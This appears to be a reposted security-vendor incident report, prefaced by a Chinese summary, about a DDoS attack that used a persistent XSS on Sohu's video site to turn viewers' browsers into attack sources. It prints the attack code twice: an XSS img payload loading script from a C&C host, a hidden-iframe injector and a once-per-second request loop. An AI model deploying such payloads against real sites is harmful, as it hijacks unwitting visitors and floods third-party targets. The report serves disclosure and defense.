from: One of World’s Largest Websites Hacked: Turns Visitors into “DDoS Zombies”
incapsula发现其一个客户遭受了应用层的DDos攻击。
大概有22000的互联网用户对其网站发起了2000万的GET请求。
该攻击是利用的一个持久性XSS,通过找到一个访问量很大网站的xss,在其网站上插入一段js代码,当其用户访问网站之后,就可以利用该网站的用户对其受害者发起攻击。
几种示例代码:
// JavaScript Injection in <img> tag enabled by Persistent XSS
<img src="/imagename.jpg" onload="$.getScript('http://c&cdomain.com/index.html')" />
// Malicious JavaScript opens hidden <iframe>
function ddos(url) {
$("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>"); }
// Ajax DDoS tool in executes GET request every second
<html><body>
<h1>Iframe</h1>
<script>
ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg');
function ddos(url,url2){
window.setInterval(function (){
$.getScript(url);
$.getScript(url2);
},1000)
}
</script>
</body></html>
这种攻击方式在找到访问量巨大的视频网站的xss之后,非常好用,因为一般的视频时间不短,这样访问者在访问视频网站观看视频的时间段内,就不知不觉的成为攻击者的工具对其受害者网站不断的发送请求。
此次被利用的是sohu视频,全球网站流量排名27,可在视频区域插入xss代码,控制观看该视频的用户对受害者不断的发送请求。
注:攻击的效果就是每秒都请求一次url和url2指定的连接,如果一段视频30分钟,那么每个用户都能在看视频这段时间内向两个目标分别发出 1800 次无意义的攻击请求(如cc),如果是成千上万的人看个热门视频的话。。。
One of World’s Largest Websites Hacked: Turns Visitors into “DDoS Zombies”
Yesterday we mitigated a unique application layer DDoS attack against one of our clients. The attack was carried out using traffic hijacking techniques, which flooded our client with over 20 million GET requests originating from the browsers of over 22,000 Internet users – all turned into unwilling accomplices by the offender.
What makes this case especially interesting is the fact that the attack was enabled by a vulnerability in one of the world’s largest and most popular sites – one of the domains on Alexa’s “Top 50” list.
We can’t disclose the domain name in question at this time, as our team is now working to resolve the breach. However, we will provide further details, once the vulnerability is fixed.
Having said that, we can already describe the method used by the attackers, in the hopes that it will help prevent similar abuse of other websites.
Persistent XSS Enables Large-Scale DDoS Attack
The site in question is a high profile video content provider, which allows its users to sign in with their own profiles. The DDoS attack was enabled by a Persistent XSS vulnerability that allowed the offender to inject JavaScript code into the <img> tag associated with the profile image. As a result, every time the image was used on one of the the site’s pages (e.g., in the comment section), the malicious code was also embedded inside, waiting to be executed by every future visitor to that page.
As a result, each time a legitimate visitor landed on that page, his browser automatically executed the injected JavaScript, which in turn injected a hidden <iframe> with the address of the DDoSer’s C&C domain. There, an Ajax-scripted DDoS tool hijacked the browser, forcing it to issue a DDoS request at a rate of one request per second.
Obviously one request per second is not a lot. However, when dealing with video content of 10, 20 and 30 minutes in length, and with thousands of views every minute, the attack can quickly become very large and extremely dangerous. Knowing this, the offender strategically posted comments on popular videos, effectively created a self-sustaining botnet comprising tens of thousands of hijacked browsers, operated by unsuspecting human visitors who were only there to watch a few funny cat videos.
// JavaScript Injection in <img> tag enabled by Persistent XSS
<img src="/imagename.jpg" onload="$.getScript('http://c&cdomain.com/index.html')" />
// Malicious JavaScript opens hidden <iframe>
function ddos(url) {
$("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>"); }
// Ajax DDoS tool in executes GET request every second
<html><body>
<h1>Iframe</h1>
<script>
ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg');
function ddos(url,url2){
window.setInterval(function (){
$.getScript(url);
$.getScript(url2);
},1000)
}
</script>
</body></html>
Intercepting the Attack
The attack was blocked by Incapsula’s progressive challenges and behavior-based security algorithms, made that much more effective by the predictable behavior of the DDoS tool. By intercepting the malicious requests, we were also able to track the source of the attack. We did this by replacing the content of the target URL with a snippet of our own JavaScript, which reported the original referral source – leading us to the abused video website.
We were then able to replicate the Persistent XSS responsible for the attack. Once we had all of this information in hand, we quickly reached out to the site support team, offering our help in fixing the issue.
It should be noted that yesterday the original DDoS tool on the attacker’s C&C domain was replaced with a much more robust version. This leads us to believe that what we saw yesterday was a sort of POC test run. The current code is not only much more sophisticated, but it is also built for keeping track of the attack, for what seems like billing purposes. From the looks of it, someone is now using this Alexa Top 50 website to set up a chain of botnets for hire.
Update: April 24
No, it wasn’t YouTube
The disclosure of this vulnerability received extensive media coverage, which was accompanied by numerous attempts to guess the website’s identity. By far, the most popular assumption was that this story is about YouTube. While we wanted to debunk that rumor, we couldn’t allow ourselves to be drawn into a “twenty questions” game, which would inevitably provide additional clues to the vulnerable website’s true identity.
Now, with the vulnerability patched, we can divulge that the site in question is Sohu.com (Chinese for “Search-fox”) – China’s 8th largest website and currently the 27th most visited website in the world.
While being relatively unfamiliar to Western audiences, Sohu is a local and global powerhouse. This rapidly growing $2.5 billion organization provides a variety of search and content solutions, including Sohu.TV – the video streaming service that enabled the DDoS attack to occur.
Once we uncovered the source of the browser-based DDoS attack and replicated persistent XSS vulnerability that allowed it to occur we immediately went on to share our findings with Sohu security team. With this information in hand Sohu team could quickly evaluate the problem and respond with a rapid patch which fixed the security hole, rendering this browser-based botnet completely useless.
Co-Authored by: Ofer Gayer – Incapsula’s Security Researcher